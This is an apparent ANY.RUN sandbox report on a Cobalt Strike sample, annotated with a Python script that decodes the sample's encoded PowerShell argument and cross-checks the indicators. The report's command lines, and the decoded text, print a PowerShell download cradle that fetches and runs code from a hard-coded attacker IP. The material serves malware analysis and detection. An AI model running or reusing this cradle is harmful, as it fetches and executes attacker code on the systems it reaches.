File name: ttest.text
Full analysis: https://app.any.run/tasks/52fe5ab9-da76-4142-8c08-91bda0ee5c69
Verdict: Malicious activity
Threats: Cobalt Strike

Cobalt Strike is a legitimate penetration-testing toolkit developed by Fortra. Cracked copies are widely adopted by threat actors, who use it as their C2 framework of choice for targeted attacks.
Analysis date: January 14, 2022, 20:35:29
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: cobaltstrike, trojan
Indicators:
MIME: text/plain
File info: ASCII text, with no line terminators
MD5: 52CB5D2BF929392C11E48F7B7BE883FB
SHA1: E250BBB9F670F05D3B1D52962C7DF8E50EA06829
SHA256: 16EA40F04D29F260D97E4B9D3F5AE0DCEFCE749119F34C1F212173907A9592D9
SSDEEP: 6:snyUeCrgSqSCUdT14Ee2vCoj70/8QpQJQkhkrRksS/nmaa:snhrgSqJb25jckXYw/Fa
ANY.RUN is an interactive service that provides full access to the guest system. Information in this report may have been distorted by user actions and is provided as is. ANY.RUN does not guarantee the maliciousness or safety of the content. In this task the analyst interacted with the VM heavily: the signatures below mark the "-file" PowerShell launches, Task Manager and six WINWORD.EXE instances as "Manual execution by user", while the Cobalt Strike detections are attached to the three powershell.exe children (PIDs 2640, 188, 2560) that the manually launched script spawned with an encoded command.
  • MALICIOUS

    • COBALTSTRIKE was detected

      • powershell.exe (PID: 2640)
      • powershell.exe (PID: 188)
      • powershell.exe (PID: 2560)
  • SUSPICIOUS

    • Reads the date of Windows installation

      • powershell.exe (PID: 2252)
      • powershell.exe (PID: 3112)
      • powershell.exe (PID: 2876)
      • powershell.exe (PID: 1108)
      • powershell.exe (PID: 3396)
    • Checks supported languages

      • powershell.exe (PID: 2252)
      • powershell.exe (PID: 2640)
      • powershell.exe (PID: 3112)
      • powershell.exe (PID: 188)
      • powershell.exe (PID: 2876)
      • powershell.exe (PID: 2560)
      • powershell.exe (PID: 1108)
      • powershell.exe (PID: 3396)
    • PowerShell script executed

      • powershell.exe (PID: 2252)
      • powershell.exe (PID: 3112)
      • powershell.exe (PID: 2876)
      • powershell.exe (PID: 1108)
      • powershell.exe (PID: 3396)
    • Application launched itself

      • powershell.exe (PID: 2252)
      • powershell.exe (PID: 3112)
      • powershell.exe (PID: 2876)
      • taskmgr.exe (PID: 1292)
    • Creates files in the user directory

      • powershell.exe (PID: 2252)
      • powershell.exe (PID: 3112)
      • powershell.exe (PID: 2876)
      • powershell.exe (PID: 1108)
      • powershell.exe (PID: 3396)
    • Reads the computer name

      • powershell.exe (PID: 2640)
      • powershell.exe (PID: 2252)
      • powershell.exe (PID: 3112)
      • powershell.exe (PID: 188)
      • powershell.exe (PID: 2876)
      • powershell.exe (PID: 2560)
      • powershell.exe (PID: 1108)
      • powershell.exe (PID: 3396)
    • Executes PowerShell scripts

      • powershell.exe (PID: 2252)
      • powershell.exe (PID: 3112)
      • powershell.exe (PID: 2876)
    • Reads Environment values

      • powershell.exe (PID: 2640)
      • powershell.exe (PID: 188)
      • powershell.exe (PID: 2560)
  • INFO

    • Checks supported languages

      • rundll32.exe (PID: 3088)
      • taskmgr.exe (PID: 1292)
      • taskmgr.exe (PID: 3360)
      • WINWORD.EXE (PID: 1764)
      • WINWORD.EXE (PID: 1364)
      • WINWORD.EXE (PID: 2464)
      • WINWORD.EXE (PID: 1856)
      • WINWORD.EXE (PID: 2784)
      • WINWORD.EXE (PID: 1340)
    • Manual execution by user

      • powershell.exe (PID: 2252)
      • powershell.exe (PID: 3112)
      • powershell.exe (PID: 2876)
      • taskmgr.exe (PID: 1292)
      • powershell.exe (PID: 1108)
      • WINWORD.EXE (PID: 1764)
      • WINWORD.EXE (PID: 1364)
      • WINWORD.EXE (PID: 2464)
      • WINWORD.EXE (PID: 1856)
      • WINWORD.EXE (PID: 2784)
      • WINWORD.EXE (PID: 1340)
      • powershell.exe (PID: 3396)
    • Checks Windows Trust Settings

      • powershell.exe (PID: 2252)
      • powershell.exe (PID: 2640)
      • powershell.exe (PID: 3112)
      • powershell.exe (PID: 188)
      • powershell.exe (PID: 2560)
      • powershell.exe (PID: 2876)
      • powershell.exe (PID: 1108)
      • powershell.exe (PID: 3396)
    • Reads the computer name

      • taskmgr.exe (PID: 1292)
      • taskmgr.exe (PID: 3360)
      • WINWORD.EXE (PID: 1764)
      • WINWORD.EXE (PID: 1364)
      • WINWORD.EXE (PID: 1856)
      • WINWORD.EXE (PID: 2464)
      • WINWORD.EXE (PID: 2784)
      • WINWORD.EXE (PID: 1340)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 1364)
      • WINWORD.EXE (PID: 1764)
      • WINWORD.EXE (PID: 2464)
      • WINWORD.EXE (PID: 1856)
      • WINWORD.EXE (PID: 2784)
      • WINWORD.EXE (PID: 1340)
    • Reads Microsoft Office registry keys

      • powershell.exe (PID: 1108)
      • WINWORD.EXE (PID: 1364)
      • WINWORD.EXE (PID: 2464)
      • WINWORD.EXE (PID: 1764)
      • powershell.exe (PID: 3396)
      • WINWORD.EXE (PID: 2784)
      • WINWORD.EXE (PID: 1340)
      • WINWORD.EXE (PID: 1856)
Find more information about signature artifacts and their mapping to the MITRE ATT&CK™ matrix in the full report.
Malware configuration: no data extracted.
All screenshots are available in the full report
Total processes: 74
Monitored processes: 17
Malicious processes: 8
Suspicious processes: 0

Behavior graph (processes in launch order; "no specs" = no malicious indicators attached; #COBALTSTRIKE = process on which the Cobalt Strike detection fired)

  rundll32.exe (no specs)
  powershell.exe (no specs)
  powershell.exe #COBALTSTRIKE
  powershell.exe (no specs)
  powershell.exe #COBALTSTRIKE
  powershell.exe (no specs)
  powershell.exe #COBALTSTRIKE
  taskmgr.exe (no specs)
  taskmgr.exe
  powershell.exe (no specs)
  winword.exe (no specs)
  winword.exe (no specs)
  winword.exe (no specs)
  winword.exe (no specs)
  winword.exe (no specs)
  winword.exe (no specs)
  powershell.exe (no specs)

Process information

PID 3088
  CMD: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL "C:\Users\admin\Desktop\ttest.text"
  Path: C:\Windows\system32\rundll32.exe
  Parent process: Explorer.EXE
  User: admin
  Company: Microsoft Corporation
  Integrity level: MEDIUM
  Description: Windows host process (Rundll32)
  Exit code: 0
  Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID 2252
  CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-file" "C:\Users\admin\Desktop\ttest.ps1"
  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Parent process: Explorer.EXE
  User: admin
  Company: Microsoft Corporation
  Integrity level: MEDIUM
  Description: Windows PowerShell
  Exit code: 0
  Version: 10.0.14409.1005 (rs1_srvoob.161208-1155)

PID 2640
  CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc aQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOAA1AC4AMQAxADIALgA4ADMALgAxADEANgA6ADgAMAA4ADAALwBkAHIAdgAnACkAKQA=
  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Parent process: powershell.exe
  User: admin
  Company: Microsoft Corporation
  Integrity level: MEDIUM
  Description: Windows PowerShell
  Exit code: 0
  Version: 10.0.14409.1005 (rs1_srvoob.161208-1155)

PID 3112
  CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-file" "C:\Users\admin\Desktop\ttest.ps1"
  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Parent process: Explorer.EXE
  User: admin
  Company: Microsoft Corporation
  Integrity level: MEDIUM
  Description: Windows PowerShell
  Exit code: 0
  Version: 10.0.14409.1005 (rs1_srvoob.161208-1155)

PID 188
  CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc aQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOAA1AC4AMQAxADIALgA4ADMALgAxADEANgA6ADgAMAA4ADAALwBkAHIAdgAnACkAKQA=
  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Parent process: powershell.exe
  User: admin
  Company: Microsoft Corporation
  Integrity level: MEDIUM
  Description: Windows PowerShell
  Exit code: 0
  Version: 10.0.14409.1005 (rs1_srvoob.161208-1155)

PID 2876
  CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-file" "C:\Users\admin\Desktop\ttest.ps1"
  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Parent process: Explorer.EXE
  User: admin
  Company: Microsoft Corporation
  Integrity level: MEDIUM
  Description: Windows PowerShell
  Exit code: 0
  Version: 10.0.14409.1005 (rs1_srvoob.161208-1155)

PID 2560
  CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc aQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOAA1AC4AMQAxADIALgA4ADMALgAxADEANgA6ADgAMAA4ADAALwBkAHIAdgAnACkAKQA=
  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Parent process: powershell.exe
  User: admin
  Company: Microsoft Corporation
  Integrity level: MEDIUM
  Description: Windows PowerShell
  Exit code: 0
  Version: 10.0.14409.1005 (rs1_srvoob.161208-1155)

PID 1292
  CMD: "C:\Windows\system32\taskmgr.exe" /4
  Path: C:\Windows\system32\taskmgr.exe
  Parent process: Explorer.EXE
  User: admin
  Company: Microsoft Corporation
  Integrity level: MEDIUM
  Description: Windows Task Manager
  Exit code: 1
  Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID 3360
  CMD: "C:\Windows\system32\taskmgr.exe" /1
  Path: C:\Windows\system32\taskmgr.exe
  Parent process: taskmgr.exe
  User: admin
  Company: Microsoft Corporation
  Integrity level: HIGH
  Description: Windows Task Manager
  Exit code: (not recorded)
  Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID 1108
  CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-file" "C:\Users\admin\AppData\Local\Temp\b87bb509-d7e5-4eef-9c5e-545e6cb556f4.ps1"
  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Parent process: Explorer.EXE
  User: admin
  Company: Microsoft Corporation
  Integrity level: MEDIUM
  Description: Windows PowerShell
  Exit code: 0
  Version: 10.0.14409.1005 (rs1_srvoob.161208-1155)
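The three powershell.exe children flagged as #COBALTSTRIKE (PIDs 2640, 188 and 2560) all carry the same "-exec bypass -enc ..." argument. The script below is an added worked example, not part of the ANY.RUN report: it decodes that argument the way powershell.exe does (the payload is base64 of UTF-16LE text, not of ASCII), flags the download-cradle traits, checks that the URL inside the decoded script is the one the sandbox logged in the HTTP requests table, and verifies that the .psm1 PowerShell dropped in %TEMP% hashes to the single byte "1" (md5("1") and sha256("1") are well-known values), so that drop is not the 57.9 Kb stage fetched from /drv. The command line, URL and hashes are copied from this report; the function names and the inline inputs are my own, and only the Python standard library is used.

```python
"""Decode the -enc argument from the report's powershell.exe command lines and
cross-check it against the network and dropped-file IOCs.  Added example, not
part of the ANY.RUN report; standard library only."""
import base64
import hashlib
import re

# Copied from the process table: PIDs 2640, 188 and 2560 all ran this line.
ENCODED_CMDLINE = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc '
    "aQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwA"
    "aQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOAA1AC4A"
    "MQAxADIALgA4ADMALgAxADEANgA6ADgAMAA4ADAALwBkAHIAdgAnACkAKQA="
)
# Copied from the HTTP requests table.
HTTP_REQUEST_URL = "http://185.112.83.116:8080/drv"
# Copied from the dropped-files table (PID 2640, ...\Temp\4ndimie2.mbd.psm1).
DROPPED_PSM1_MD5 = "C4CA4238A0B923820DCC509A6F75849B"
DROPPED_PSM1_SHA256 = "6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B"

# powershell.exe accepts any unambiguous prefix of a parameter name, plus the
# documented short forms -e / -ec for -EncodedCommand.  -ex, -exec, ... belong
# to -ExecutionPolicy and must not be mistaken for an encoded command.
_ENC_FLAGS = {"e", "ec"} | {"encodedcommand"[:i] for i in range(2, 15)}
_EXEC_FLAGS = {"executionpolicy"[:i] for i in range(2, 16)}
_URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return (script, execution_policy) for a powershell.exe command line.
    script is None when no -EncodedCommand argument is present.  The payload is
    base64 of UTF-16LE text, so decoding it as ASCII/UTF-8 yields NUL-padded junk."""
    tokens = cmdline.split()
    script = policy = None
    for i, tok in enumerate(tokens[:-1]):
        if not tok.startswith(("-", "/")):
            continue
        flag = tok[1:].lower()
        if flag in _EXEC_FLAGS:
            policy = tokens[i + 1].strip('"').lower()
        elif flag in _ENC_FLAGS:
            raw = base64.b64decode(tokens[i + 1].strip('"'), validate=True)
            if len(raw) % 2:
                raise ValueError("-enc payload has odd length; not UTF-16LE")
            script = raw.decode("utf-16-le")
    return script, policy


def triage(script):
    """Flag the download-cradle traits this report's signatures fired on."""
    low = script.lower()
    return {
        "invoke_expression": re.search(r"\biex\b|invoke-expression", low) is not None,
        "downloadstring": "downloadstring" in low,
        "urls": _URL_RE.findall(script),
    }


def file_hashes(data):
    """Upper-case MD5 and SHA-256 hex digests, matching the report's format."""
    return hashlib.md5(data).hexdigest().upper(), hashlib.sha256(data).hexdigest().upper()


def analyse_report():
    """Decode the cradle and cross-check it against the report's other IOCs."""
    script, policy = decode_encoded_command(ENCODED_CMDLINE)
    findings = triage(script)
    findings["execution_policy"] = policy
    # The URL inside the decoded script should be the one the sandbox saw on the wire.
    findings["url_matches_http_table"] = HTTP_REQUEST_URL in findings["urls"]
    # md5("1") / sha256("1") are well-known values; if they match, the dropped
    # .psm1 held the single byte "1" and is not the 57.9 Kb stage fetched from /drv.
    findings["psm1_is_literal_1"] = file_hashes(b"1") == (DROPPED_PSM1_MD5, DROPPED_PSM1_SHA256)
    return script, findings


if __name__ == "__main__":
    decoded, result = analyse_report()
    print(decoded)
    for key, value in result.items():
        print(f"{key}: {value}")
```

The decoded script is a one-line download cradle: iex ((New-Object System.Net.WebClient).DownloadString('http://185.112.83.116:8080/drv')). Nothing touches disk before execution, which is why the only files PowerShell wrote are the jump-list entries and the one-byte .psm1 in the dropped-files table, and why the payload itself is visible only in the HTTP response and the PCAP of the full report.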
Total events: 27 573
Read events: 24 868
Write events: 0
Delete events: 0
Modification events: no data
Executable files: 0
Suspicious files: 81
Text files: 59
Unknown types: 60

Dropped files

PID 2252, powershell.exe, binary
  C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UWQXBR131BVQCOF4MIX8.temp
  MD5: 3C4F6C229966CFB1669BE9E688C7837A  SHA256: 35A2EB8E2E0AE41B3B7A5614F30F6E46FBBB11935546D66C3775B8BF85A5A82D
PID 3112, powershell.exe, binary
  C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ITO4TTKJEPUU4MJ82CTL.temp
  MD5: 3C4F6C229966CFB1669BE9E688C7837A  SHA256: 35A2EB8E2E0AE41B3B7A5614F30F6E46FBBB11935546D66C3775B8BF85A5A82D
PID 2252, powershell.exe, binary
  C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1156e7.TMP
  MD5: CCFCF369F751CE8DA0370D84E52A7EED  SHA256: 53922490C3F5A04667EC3605A01AF2A4F4F265782D1BCA519F63ACAD413F2ED9
PID 2252, powershell.exe, binary
  C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  MD5: 3C4F6C229966CFB1669BE9E688C7837A  SHA256: 35A2EB8E2E0AE41B3B7A5614F30F6E46FBBB11935546D66C3775B8BF85A5A82D
PID 3112, powershell.exe, binary
  C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1166b6.TMP
  MD5: 3C4F6C229966CFB1669BE9E688C7837A  SHA256: 35A2EB8E2E0AE41B3B7A5614F30F6E46FBBB11935546D66C3775B8BF85A5A82D
PID 2876, powershell.exe, binary
  C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF11701c.TMP
  MD5: 3C4F6C229966CFB1669BE9E688C7837A  SHA256: 35A2EB8E2E0AE41B3B7A5614F30F6E46FBBB11935546D66C3775B8BF85A5A82D
PID 3112, powershell.exe, binary
  C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  MD5: 3C4F6C229966CFB1669BE9E688C7837A  SHA256: 35A2EB8E2E0AE41B3B7A5614F30F6E46FBBB11935546D66C3775B8BF85A5A82D
PID 2876, powershell.exe, binary
  C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PHSG80632C9STIMFYKE1.temp
  MD5: 3C4F6C229966CFB1669BE9E688C7837A  SHA256: 35A2EB8E2E0AE41B3B7A5614F30F6E46FBBB11935546D66C3775B8BF85A5A82D
PID 2876, powershell.exe, binary
  C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  MD5: 3C4F6C229966CFB1669BE9E688C7837A  SHA256: 35A2EB8E2E0AE41B3B7A5614F30F6E46FBBB11935546D66C3775B8BF85A5A82D
PID 2640, powershell.exe, binary
  C:\Users\admin\AppData\Local\Temp\4ndimie2.mbd.psm1
  MD5: C4CA4238A0B923820DCC509A6F75849B  SHA256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B

Nine of the ten drops are Explorer jump-list bookkeeping under Recent\CustomDestinations, written because the .ps1 files were opened from the desktop; this is what the "Creates files in the user directory" signature is reacting to. The only file written by a #COBALTSTRIKE process is the .psm1 in %TEMP%, whose MD5 and SHA256 are those of the single byte "1". The downloaded stage itself never hit disk.
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 3
TCP/UDP connections: 3
DNS requests: 0
Threats: 0

HTTP requests

PID   Process         Method  HTTP Code  IP                   URL                             CN  Type  Size     Reputation
2640  powershell.exe  GET     200        185.112.83.116:8080  http://185.112.83.116:8080/drv  RU  text  57.9 Kb  malicious
188   powershell.exe  GET     200        185.112.83.116:8080  http://185.112.83.116:8080/drv  RU  text  57.9 Kb  malicious
2560  powershell.exe  GET     200        185.112.83.116:8080  http://185.112.83.116:8080/drv  RU  text  57.9 Kb  malicious

The URL is the one embedded in the three processes' -enc argument. Each fetch returned a 57.9 Kb text body, which is the inbound PowerShell payload the Cobalt Strike network signature fired on.

Connections

PID   Process         IP                   Domain  ASN                            CN  Reputation
188   powershell.exe  185.112.83.116:8080  -       Total Server Solutions L.L.C.  RU  malicious
2640  powershell.exe  185.112.83.116:8080  -       Total Server Solutions L.L.C.  RU  malicious
2560  powershell.exe  185.112.83.116:8080  -       Total Server Solutions L.L.C.  RU  malicious

The Domain column is empty for all three connections: the cradle connects to a hard-coded IP on port 8080, which is consistent with zero DNS requests in this task, so DNS-based detection would not have caught it.

DNS requests: no data

Threats

PID   Process         Class                          Message
2640  powershell.exe  A Network Trojan was detected  AV MALWARE CobaltStrike Trojan Powershell Payload Inbound
188   powershell.exe  A Network Trojan was detected  AV MALWARE CobaltStrike Trojan Powershell Payload Inbound
2560  powershell.exe  A Network Trojan was detected  AV MALWARE CobaltStrike Trojan Powershell Payload Inbound
No debug info